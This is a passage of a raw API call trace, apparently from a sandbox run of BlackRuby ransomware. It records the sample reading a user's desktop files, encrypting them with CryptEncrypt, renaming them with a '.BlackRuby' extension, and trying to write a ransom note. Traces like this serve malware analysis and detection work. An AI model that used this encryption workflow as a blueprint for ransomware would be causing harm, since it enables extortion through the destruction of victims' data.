lpBuffer=0x1b94b4c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1b94b4c*, lpNumberOfBytesRead=0x18ed84*=0x2800, lpOverlapped=0x0) returned 1 [0055.647] GetLastError () returned 0x0 [0055.647] CloseHandle (hObject=0x184) returned 1 [0055.647] GetLastError () returned 0x0 [0055.648] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\8tDyd_-768O5WAxYhm7q.jpg", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\8tDyd_-768O5WAxYhm7q.jpg", lpFilePart=0x0) returned 0x31 [0055.648] GetLastError () returned 0x0 [0055.648] SetErrorMode (uMode=0x1) returned 0x0 [0055.648] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\8tDyd_-768O5WAxYhm7q.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\8tdyd_-768o5waxyhm7q.jpg"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b4c88e0, ftCreationTime.dwHighDateTime=0x1d34e2d, ftLastAccessTime.dwLowDateTime=0x56ba8520, ftLastAccessTime.dwHighDateTime=0x1d35862, ftLastWriteTime.dwLowDateTime=0x56ba8520, ftLastWriteTime.dwHighDateTime=0x1d35862, nFileSizeHigh=0x0, nFileSizeLow=0x2800)) returned 1 [0055.648] GetLastError () returned 0x0 [0055.648] SetErrorMode (uMode=0x0) returned 0x1 [0055.648] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c4e8) returned 1 [0055.648] GetLastError () returned 0x0 [0055.684] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1bf3f1c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360a20) returned 1 [0055.684] GetLastError () returned 0x0 [0055.684] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.685] GetLastError () returned 0x0 [0055.690] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.690] GetLastError () returned 0x0 [0055.690] CryptDuplicateKey (in: hKey=0x360a20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360da0) returned 1 [0055.690] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.690] GetLastError () returned 0x0 [0055.690] CryptSetKeyParam (hKey=0x360da0, dwParam=0x4, pbData=0x1c20f68*=0x1, dwFlags=0x0) returned 1 [0055.690] GetLastError () returned 0x0 [0055.690] CryptSetKeyParam (hKey=0x360da0, dwParam=0x1, pbData=0x1c20f34, dwFlags=0x0) returned 1 [0055.690] GetLastError () returned 0x0 [0055.690] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c20fb0*, pdwDataLen=0x18ed74*=0x2900, dwBufLen=0x2900 | out: pbData=0x1c20fb0*, pdwDataLen=0x18ed74*=0x2900) returned 1 [0055.690] GetLastError () returned 0x0 [0055.690] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c261dc*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c261dc*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0055.690] GetLastError () returned 0x0 [0055.690] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c2620c*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c2620c*, pdwDataLen=0x18ed94*=0x10) returned 1 [0055.690] GetLastError () returned 0x0 [0055.690] CryptDestroyKey (hKey=0x360a20) returned 1 [0055.690] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0055.690] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0055.690] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\8tDyd_-768O5WAxYhm7q.jpg", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\8tDyd_-768O5WAxYhm7q.jpg", lpFilePart=0x0) returned 0x31 [0055.690] GetLastError () returned 0x0 [0055.690] SetErrorMode (uMode=0x1) returned 0x0 [0055.690] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\8tDyd_-768O5WAxYhm7q.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\8tdyd_-768o5waxyhm7q.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.692] GetLastError () returned 0xb7 [0055.692] GetFileType (hFile=0x184) returned 0x1 [0055.692] SetErrorMode (uMode=0x0) returned 0x1 [0055.692] GetFileType (hFile=0x184) returned 0x1 [0055.693] CloseHandle (hObject=0x184) returned 1 [0055.693] GetLastError () returned 0xb7 [0055.693] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\8tDyd_-768O5WAxYhm7q.jpg", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\8tDyd_-768O5WAxYhm7q.jpg", lpFilePart=0x0) returned 0x31 [0055.693] GetLastError () returned 0xb7 [0055.693] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_CI82cMjwvSFieWJB714CMOPnTRd240oJVINyYh299Oq.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_CI82cMjwvSFieWJB714CMOPnTRd240oJVINyYh299Oq.BlackRuby", lpFilePart=0x0) returned 0x58 [0055.693] GetLastError () returned 0xb7 [0055.693] SetErrorMode (uMode=0x1) returned 0x0 [0055.693] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\8tDyd_-768O5WAxYhm7q.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\8tdyd_-768o5waxyhm7q.jpg"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b4c88e0, ftCreationTime.dwHighDateTime=0x1d34e2d, ftLastAccessTime.dwLowDateTime=0x56ba8520, ftLastAccessTime.dwHighDateTime=0x1d35862, ftLastWriteTime.dwLowDateTime=0x2962bcc0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x2910)) returned 1 [0055.693] GetLastError () returned 0xb7 [0055.693] SetErrorMode (uMode=0x0) returned 0x1 [0055.693] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\8tDyd_-768O5WAxYhm7q.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\8tdyd_-768o5waxyhm7q.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_CI82cMjwvSFieWJB714CMOPnTRd240oJVINyYh299Oq.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\encrypted_ci82cmjwvsfiewjb714cmopntrd240ojvinyyh299oq.blackruby")) returned 1 [0055.694] GetLastError () returned 0xb7 [0055.694] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x31 [0055.694] GetLastError () returned 0xb7 [0055.694] SetErrorMode (uMode=0x1) returned 0x0 [0055.694] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0055.694] GetLastError () returned 0x5 [0055.696] SetErrorMode (uMode=0x0) returned 0x1 [0055.696] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BEvqzv.wav", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\BEvqzv.wav", lpFilePart=0x0) returned 0x23 [0055.696] GetLastError () returned 0x5 [0055.696] SetErrorMode (uMode=0x1) returned 0x0 [0055.696] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BEvqzv.wav" (normalized: "c:\\users\\eebsym5\\desktop\\bevqzv.wav"), fInfoLevelId=0x0, lpFileInformation=0x1c4ae68 | out: lpFileInformation=0x1c4ae68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb8cfda0, ftCreationTime.dwHighDateTime=0x1d35604, ftLastAccessTime.dwLowDateTime=0x18a844c0, ftLastAccessTime.dwHighDateTime=0x1d34c28, ftLastWriteTime.dwLowDateTime=0x18a844c0, ftLastWriteTime.dwHighDateTime=0x1d34c28, nFileSizeHigh=0x0, nFileSizeLow=0x5386)) returned 1 [0055.696] GetLastError () returned 0x5 [0055.696] SetErrorMode (uMode=0x0) returned 0x1 [0055.696] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BEvqzv.wav", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\BEvqzv.wav", lpFilePart=0x0) returned 0x23 [0055.696] GetLastError () returned 0x5 [0055.696] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BEvqzv.wav", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\BEvqzv.wav", lpFilePart=0x0) returned 0x23 [0055.696] GetLastError () returned 0x5 [0055.696] SetErrorMode (uMode=0x1) returned 0x0 [0055.696] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BEvqzv.wav" (normalized: "c:\\users\\eebsym5\\desktop\\bevqzv.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.696] GetLastError () returned 0x0 [0055.696] GetFileType (hFile=0x184) returned 0x1 [0055.697] SetErrorMode (uMode=0x0) returned 0x1 [0055.697] GetFileType (hFile=0x184) returned 0x1 [0055.697] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x5386 [0055.697] GetLastError () returned 0x0 [0055.697] ReadFile (in: hFile=0x184, lpBuffer=0x1c4c8a0, nNumberOfBytesToRead=0x5386, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c4c8a0*, lpNumberOfBytesRead=0x18ed84*=0x5386, lpOverlapped=0x0) returned 1 [0055.697] GetLastError () returned 0x0 [0055.697] CloseHandle (hObject=0x184) returned 1 [0055.697] GetLastError () returned 0x0 [0055.698] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BEvqzv.wav", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\BEvqzv.wav", lpFilePart=0x0) returned 0x23 [0055.698] GetLastError () returned 0x0 [0055.698] SetErrorMode (uMode=0x1) returned 0x0 [0055.698] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BEvqzv.wav" (normalized: "c:\\users\\eebsym5\\desktop\\bevqzv.wav"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb8cfda0, ftCreationTime.dwHighDateTime=0x1d35604, ftLastAccessTime.dwLowDateTime=0x18a844c0, ftLastAccessTime.dwHighDateTime=0x1d34c28, ftLastWriteTime.dwLowDateTime=0x18a844c0, ftLastWriteTime.dwHighDateTime=0x1d34c28, nFileSizeHigh=0x0, nFileSizeLow=0x5386)) returned 1 [0055.698] GetLastError () returned 0x0 [0055.698] SetErrorMode (uMode=0x0) returned 0x1 [0055.708] CryptImportKey (in: hProv=0x37c708, pbData=0x1cb133c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360fa0) returned 1 [0055.708] GetLastError () returned 0x0 [0055.708] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.708] GetLastError () returned 0x0 [0055.717] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.717] GetLastError () returned 0x0 [0055.717] CryptDuplicateKey (in: hKey=0x360fa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360f60) returned 1 [0055.717] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.717] GetLastError () returned 0x0 [0055.717] CryptSetKeyParam (hKey=0x360f60, dwParam=0x4, pbData=0x1cde388*=0x1, dwFlags=0x0) returned 1 [0055.717] GetLastError () returned 0x0 [0055.717] CryptSetKeyParam (hKey=0x360f60, dwParam=0x1, pbData=0x1cde354, dwFlags=0x0) returned 1 [0055.717] GetLastError () returned 0x0 [0055.717] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cde3d0*, pdwDataLen=0x18ed74*=0x5480, dwBufLen=0x5480 | out: pbData=0x1cde3d0*, pdwDataLen=0x18ed74*=0x5480) returned 1 [0055.717] GetLastError () returned 0x0 [0055.717] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ce8cfc*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1ce8cfc*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0055.717] GetLastError () returned 0x0 [0055.717] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1ce8d2c*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1ce8d2c*, pdwDataLen=0x18ed94*=0x10) returned 1 [0055.717] GetLastError () returned 0x0 [0055.717] CryptDestroyKey (hKey=0x360fa0) returned 1 [0055.718] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0055.718] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0055.718] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BEvqzv.wav", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\BEvqzv.wav", lpFilePart=0x0) returned 0x23 [0055.718] GetLastError () returned 0x0 [0055.718] SetErrorMode (uMode=0x1) returned 0x0 [0055.719] GetFileType (hFile=0x184) returned 0x1 [0055.719] GetFileType (hFile=0x184) returned 0x1 [0055.720] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\BEvqzv.wav" (normalized: "c:\\users\\eebsym5\\desktop\\bevqzv.wav"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_OdM1n9pbn9eKuv3FXg5RZs5rLk40y39F4w5K.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\encrypted_odm1n9pbn9ekuv3fxg5rzs5rlk40y39f4w5k.blackruby")) returned 1 [0055.721] GetLastError () returned 0xb7 [0055.722] SetErrorMode (uMode=0x0) returned 0x1 [0055.723] SetErrorMode (uMode=0x0) returned 0x1 [0055.724] SetErrorMode (uMode=0x0) returned 0x1 [0055.747] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x31 [0055.747] GetLastError () returned 0x5 [0055.747] SetErrorMode (uMode=0x1) returned 0x0 [0055.747] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0055.747] GetLastError () returned 0x5 [0055.748] SetErrorMode (uMode=0x0) returned 0x1 [0055.749] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Dp_WQ37tn07FYxJ.wav", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Dp_WQ37tn07FYxJ.wav", lpFilePart=0x0) returned 0x2c [0055.749] GetLastError () returned 0x5 [0055.749] SetErrorMode (uMode=0x1) returned 0x0 [0055.749] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Dp_WQ37tn07FYxJ.wav" (normalized: "c:\\users\\eebsym5\\desktop\\dp_wq37tn07fyxj.wav"), fInfoLevelId=0x0, lpFileInformation=0x1b5eb6c | out: lpFileInformation=0x1b5eb6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d12e610, ftCreationTime.dwHighDateTime=0x1d3555c, ftLastAccessTime.dwLowDateTime=0x1389b750, ftLastAccessTime.dwHighDateTime=0x1d34c30, ftLastWriteTime.dwLowDateTime=0x1389b750, ftLastWriteTime.dwHighDateTime=0x1d34c30, nFileSizeHigh=0x0, nFileSizeLow=0x887a)) returned 1 [0055.749] GetLastError () returned 0x5 [0055.749] SetErrorMode (uMode=0x0) returned 0x1 [0055.749] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Dp_WQ37tn07FYxJ.wav", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Dp_WQ37tn07FYxJ.wav", lpFilePart=0x0) returned 0x2c [0055.749] GetLastError () returned 0x5 [0055.749] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Dp_WQ37tn07FYxJ.wav", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Dp_WQ37tn07FYxJ.wav", lpFilePart=0x0) returned 0x2c [0055.749] GetLastError () returned 0x5 [0055.749] SetErrorMode (uMode=0x1) returned 0x0 [0055.749] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Dp_WQ37tn07FYxJ.wav" (normalized: "c:\\users\\eebsym5\\desktop\\dp_wq37tn07fyxj.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.749] GetLastError () returned 0x0 [0055.749] GetFileType (hFile=0x184) returned 0x1 [0055.749] SetErrorMode (uMode=0x0) returned 0x1 [0055.749] GetFileType (hFile=0x184) returned 0x1 [0055.749] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x887a [0055.749] GetLastError () returned 0x0 [0055.750] ReadFile (in: hFile=0x184, lpBuffer=0x1b60b10, nNumberOfBytesToRead=0x887a, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1b60b10*, lpNumberOfBytesRead=0x18ed84*=0x887a, lpOverlapped=0x0) returned 1 [0055.754] GetLastError () returned 0x0 [0055.754] CloseHandle (hObject=0x184) returned 1 [0055.754] GetLastError () returned 0x0 [0055.754] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Dp_WQ37tn07FYxJ.wav", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Dp_WQ37tn07FYxJ.wav", lpFilePart=0x0) returned 0x2c [0055.754] GetLastError () returned 0x0 [0055.754] SetErrorMode (uMode=0x1) returned 0x0 [0055.754] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Dp_WQ37tn07FYxJ.wav" (normalized: "c:\\users\\eebsym5\\desktop\\dp_wq37tn07fyxj.wav"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d12e610, ftCreationTime.dwHighDateTime=0x1d3555c, ftLastAccessTime.dwLowDateTime=0x1389b750, ftLastAccessTime.dwHighDateTime=0x1d34c30, ftLastWriteTime.dwLowDateTime=0x1389b750, ftLastWriteTime.dwHighDateTime=0x1d34c30, nFileSizeHigh=0x0, nFileSizeLow=0x887a)) returned 1 [0055.754] GetLastError () returned 0x0 [0055.754] SetErrorMode (uMode=0x0) returned 0x1 [0055.754] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c680) returned 1 [0055.754] GetLastError () returned 0x0 [0055.873] CryptImportKey (in: hProv=0x37c680, pbData=0x1bcbfc4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360aa0) returned 1 [0055.873] GetLastError () returned 0x0 [0055.873] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.873] GetLastError () returned 0x0 [0055.878] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.878] GetLastError () returned 0x0 [0055.878] CryptDuplicateKey (in: hKey=0x360aa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360d20) returned 1 [0055.878] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.878] GetLastError () returned 0x0 [0055.878] CryptSetKeyParam (hKey=0x360d20, dwParam=0x4, pbData=0x1bf9010*=0x1, dwFlags=0x0) returned 1 [0055.878] GetLastError () returned 0x0 [0055.878] CryptSetKeyParam (hKey=0x360d20, dwParam=0x1, pbData=0x1bf8fdc, dwFlags=0x0) returned 1 [0055.878] GetLastError () returned 0x0 [0055.879] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bf9058*, pdwDataLen=0x18ed74*=0x8970, dwBufLen=0x8970 | out: pbData=0x1bf9058*, pdwDataLen=0x18ed74*=0x8970) returned 1 [0055.879] GetLastError () returned 0x0 [0055.879] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c0a364*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c0a364*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0055.879] GetLastError () returned 0x0 [0055.879] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c0a394*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c0a394*, pdwDataLen=0x18ed94*=0x10) returned 1 [0055.879] GetLastError () returned 0x0 [0055.879] CryptDestroyKey (hKey=0x360aa0) returned 1 [0055.879] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0055.879] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0055.879] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Dp_WQ37tn07FYxJ.wav", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Dp_WQ37tn07FYxJ.wav", lpFilePart=0x0) returned 0x2c [0055.879] GetLastError () returned 0x0 [0055.879] SetErrorMode (uMode=0x1) returned 0x0 [0055.879] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Dp_WQ37tn07FYxJ.wav" (normalized: "c:\\users\\eebsym5\\desktop\\dp_wq37tn07fyxj.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.880] GetLastError () returned 0xb7 [0055.880] GetFileType (hFile=0x184) returned 0x1 [0055.880] SetErrorMode (uMode=0x0) returned 0x1 [0055.880] GetFileType (hFile=0x184) returned 0x1 [0055.882] CloseHandle (hObject=0x184) returned 1 [0055.882] GetLastError () returned 0xb7 [0055.882] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Dp_WQ37tn07FYxJ.wav", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Dp_WQ37tn07FYxJ.wav", lpFilePart=0x0) returned 0x2c [0055.882] GetLastError () returned 0xb7 [0055.882] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_BTOEsCPQ8kLdMpO1fxGg7oUTZ0A8pOW0EM7GqMuoQkB.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_BTOEsCPQ8kLdMpO1fxGg7oUTZ0A8pOW0EM7GqMuoQkB.BlackRuby", lpFilePart=0x0) returned 0x58 [0055.882] GetLastError () returned 0xb7 [0055.882] SetErrorMode (uMode=0x1) returned 0x0 [0055.882] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Dp_WQ37tn07FYxJ.wav" (normalized: "c:\\users\\eebsym5\\desktop\\dp_wq37tn07fyxj.wav"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d12e610, ftCreationTime.dwHighDateTime=0x1d3555c, ftLastAccessTime.dwLowDateTime=0x1389b750, ftLastAccessTime.dwHighDateTime=0x1d34c30, ftLastWriteTime.dwLowDateTime=0x297f4d40, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x8980)) returned 1 [0055.882] GetLastError () returned 0xb7 [0055.882] SetErrorMode (uMode=0x0) returned 0x1 [0055.882] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\Dp_WQ37tn07FYxJ.wav" (normalized: "c:\\users\\eebsym5\\desktop\\dp_wq37tn07fyxj.wav"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_BTOEsCPQ8kLdMpO1fxGg7oUTZ0A8pOW0EM7GqMuoQkB.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\encrypted_btoescpq8kldmpo1fxgg7outz0a8pow0em7gqmuoqkb.blackruby")) returned 1 [0055.883] GetLastError () returned 0xb7 [0055.883] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x31 [0055.883] GetLastError () returned 0xb7 [0055.883] SetErrorMode (uMode=0x1) returned 0x0 [0055.883] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0055.883] GetLastError () returned 0x5 [0055.884] SetErrorMode (uMode=0x0) returned 0x1 [0055.884] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\FEqCtc0h4ZNhJIzvVo.wav", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\FEqCtc0h4ZNhJIzvVo.wav", lpFilePart=0x0) returned 0x2f [0055.884] GetLastError () returned 0x5 [0055.884] SetErrorMode (uMode=0x1) returned 0x0 [0055.884] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\FEqCtc0h4ZNhJIzvVo.wav" (normalized: 